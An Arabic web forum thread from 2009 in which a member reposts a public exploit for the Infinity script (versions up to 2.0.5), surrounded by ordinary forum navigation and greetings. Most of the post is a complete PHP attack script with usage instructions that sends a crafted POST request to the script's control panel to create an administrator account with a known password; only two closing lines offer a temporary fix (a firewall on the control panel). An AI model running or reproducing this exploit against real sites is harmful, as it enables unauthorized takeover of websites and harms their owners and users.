التميز خلال 24 ساعة
 العضو الأكثر نشاطاً هذا اليوم   الموضوع النشط هذا اليوم   المشرف المميزلهذا اليوم    المشرفة المميزه 

شهر الخير جاء هلا هلا
بقلم : ذيب اجا
قريبا

تتوالى مسيرة العطاء هنا في بعد حيي الى ان يحين قطاف الثمر فيطيب المذاق وتتراكض الحروف وتتراقص النغمات عبر كلماتكم ونبض مشاعركم وسنا اقلامكم وصدق ابجدياتكم ونقآء قلوبكم وطهر اصالتكم فآزهرت بها اروقة المنتدى واينعت . فانتشت الارواح بعطر اقلامكم الآخاذ و امتزجت ببساطة الروح وعمق المعنى ورقي الفكر .. هذا هو آنتم دانه ببحر بعد حيي تتلألأ بانفراد وتميز فلا يمكن لمداها العاصف ان يتوقف ولا لانهارها ان تجف ولا لشمس ابداعها ان تغرب.لذلك معا نصل للمعالي ونسمو للقمم ..... دمتم وطبتم دوما وابدا ....... (منتديات بعد حيي).. هنا في منتديات بعد حيي يمنع جميع الاغاني ويمنع اي صور غير لائقه او تحتوي على روابط منتديات ويمنع وضع اي ايميل بالتواقيع .. ويمنع اي مواضيع فيها عنصريه قبليه او مذهبيه منعا باتاا .....اجتمعنا هنا لنكسب الفائده وليس لنكسب الذنوب وفق الله المسلمين للتمسك بدينهم والبصيرة في أمرهم إنه قريب مجيب جزاكم الله خير ا ........ كل الود لقلوبكم !! كلمة الإدارة

منتدى المعتكف الأدبي
عدد مرات النقر : 14
عدد  مرات الظهور : 892,531

 
العودة   منتديات بعد حيي > المــــنتديات التقنيـــــة > منتدى الكمبيوتر والإنترنت - وتطوير المنتديات

 

« آخـــر الـــمـــشـــاركــــات »
         :: $$ يهمه الغدر ما همه سلامة روح $$ (آخر رد :ولد القصيد)       :: شاحب مبهرج بطريقة ....ما (آخر رد :ريما)       :: شهر الخير جاء هلا هلا (آخر رد :ذيب اجا)       :: بين شعورٍ وكلمة (آخر رد :نايف سلمى)       :: ........ نايفات ........ (آخر رد :نايف سلمى)       :: وجهة نظر (آخر رد :الجوري)       :: #((أمسي سامر النجمات لأن روحي غدى محروق))# (آخر رد :شبام)       :: [ .. إعتذارات رُبما تصل .. ] (آخر رد :بنت السحاب)       :: ديوان رسائل من المقهى - إلى وجهتك. (آخر رد :بنت السحاب)       :: مزرعتي.... (آخر رد :الفلاح)      

الإهداءات
فرح الايام من من مكة : كويتية: «جمعة مباركة يا الغاليين، الله يسعد قلوبكم ويجعل هالجمعة خفيفة على الروح 🤍     نسمات من ذكر : سبحان الله وبحمده عدد خلقه ورضا نفسه وزنة عرشه ومداد كلماته     رهينك ياحياتي من الصالة : مغرور رد علي او. بسويههااا     فرح الايام من من بعد حي : مشكور اخوي الساري لدعمك واتمنى لك الاذدهار     سها من الرياض : شكرا ابو طارق عساك للعافيه يارب     الـ ساري من بعد حيكم : شكر خاص للاخت فرح الايام على جهودها بالاخبار والاحداث بارك الله فيك الله يستر عليك اختي على التغطيه الدائمة    

 
 
أدوات الموضوع انواع عرض الموضوع
قديم 08-16-2009, 01:45 AM   #1


الصورة الرمزية مخاوي الكيبورد
مخاوي الكيبورد غير متصل

بيانات اضافيه [ + ]
 رقم العضوية : 13918
 تاريخ التسجيل :  Jun 2009
 أخر زيارة : 08-07-2010 (07:08 AM)
 المشاركات : 161 [ + ]
 التقييم :  50
لوني المفضل : Cadetblue
[ ترقيع ] ثغرة بمجلة الانفنتي !



http://milw0rm.com/exploits/9159
Infinity <= 2.0.5 Arbitrary Create Admin Exploit

كود PHP:
          <?php
print_r
('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .

                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
[q] Infinity <= 2.0.5 Create Admin __/QQQ/````````````````\QQQ\___
                                 _/QQQQQ/                  \QQQQQQ\
[q] _POST <3                    /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] Owned :)                  |QQQQ/    By  Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[WHAT?]-                \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                         ```````````````````     `````
 ______________________________________________________________________________
/                                                                              \
|       :: Stupid vulnerability in a good script :( tsk tsk                    |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                                    Sec-Code.com
                                    

USAGE: php whatever.php localhost /infinity/


'
);

ini_set("max_execution_time",0);

 function 
QABANDI($victim,$vic_dir){
$host $victim;
$p "http://".$host.$vic_dir;




          
$data   ="name=qabandi&password=qabandi&conf_password=qabandi&email=[COLOR=red] ( تم حذف البريد لأن عرضه مخالف لشروط المنتدى ) [/COLOR]&nat=man&hoppy=QabandiWasHere&text=QabandiWasHere&country=1";
          
$packet ="POST ".$p."/cp/profile.php?action=donewauthor HTTP/1.0\r\n";
          
$packet.="****************************-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="****************************-Length: ".strlen($data)."\r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
$packet.=$data;



         
//print $packet;
    
$o = @fsockopen($host80);
    if(!
$o){
        echo 
"\n[x] No response...\n";
        die;
    }
    
    
fputs($o$packet);
    while (!
feof($o)) $data .= fread($o1024);
    
fclose($o);
    
    
$_404 strstr$data"HTTP/1.1 404 Not Found" );
    if ( !empty(
$_404) ){
        echo 
"\n[x] 404 Not Found... Make sure of path. \n";
        die;
    }
    
        
$_401 strstr$data"401 Authorization Required" );
    if ( !empty(
$_401) ){
        echo 
"\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n";
        die;
    }
                                          
                                           echo 
"Admin created !\n\nUsername: qabandi\npassword: qabandi";

 }

$host1 $argv[1];
$userdir1=$argv[2];
QABANDI($host1,$userdir1);

die;


?>
حياكم الله ..
ثغرة نزلت بتاريخ 2009-07-15 وللاسف فيه مواقع عربية مصابة للحين ..
خطورة الثغرة : عرض password & user الادمن
ترقيع الثغرة المؤقت : وضع جدار ناري على لوحة تحكم السكربت
فـ بالتالي ماراح يشتغل اكسبلويت الثغرة اللي فوق وماراح تعطي اي نتيجة
الله يحفظكمـ انتمـ ومواقع المسلمين ..
مكتشف الثغرة واحد من الاصدقاء
./ مخاوي الكيبورد




 

رد مع اقتباس
 


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

(عرض الكل الاعضاء الذين شاهدو هذا الموضوع: 2
,

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 08:35 PM.


Powered by vBulletin® Copyright ©2000 - 2026, Jelsoft Enterprises Ltd. TranZ By Almuhajir
HêĽм √ 3.2 OPS BY: ! ωαнαм ! © 2010
Ads Organizer 3.0.3 by Analytics - Distance Education